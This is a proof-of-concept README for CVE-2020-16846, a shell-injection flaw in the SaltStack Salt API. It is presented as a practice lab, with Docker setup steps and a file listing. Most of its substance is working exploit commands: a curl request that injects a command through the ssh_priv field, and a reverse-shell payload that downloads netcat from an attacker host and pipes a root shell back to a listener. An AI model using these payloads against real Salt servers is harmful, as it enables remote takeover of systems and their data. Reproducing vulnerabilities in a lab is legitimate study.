# CVE-2020-16846-Saltstack-Salt-API
Vulnerability Explained: An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. The details about this vulnerability can be found here:
https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities
For practice and learning purposes, I have decided to create a vulnerable instance and exploit it.
Vulnerable version: https://github.com/saltstack/salt/releases/tag/v3002
Tested on Ubuntu 20.04.03
## Instructions
Use the Dockerfile to create a vulnerable instance in Docker.
Run salt_setup.sh if want to create a vulnerable instance on an ubuntu VM.
#### Build the image
> docker build -t salt-image .
####
Run the container and expose ports (only 8080 is actually needed to be able to exploit it)
> docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest
#### Exploitation
> curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'
Reverse shell
```
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f #"}'
```
[4.0K] /data/pocs/8df318d29db8c77dccdf53b34fb4923f04ca0e9e
├── [1.1K] Dockerfile
├── [4.0K] img
│ ├── [2.3M] api.png
│ ├── [1.5M] pwned.png
│ └── [2.7M] rev_shell_payload.png
├── [1.6K] README.md
├── [4.0K] resources
│ ├── [ 171] master
│ └── [ 40] roster
└── [ 738] salt_setup.sh
2 directories, 8 files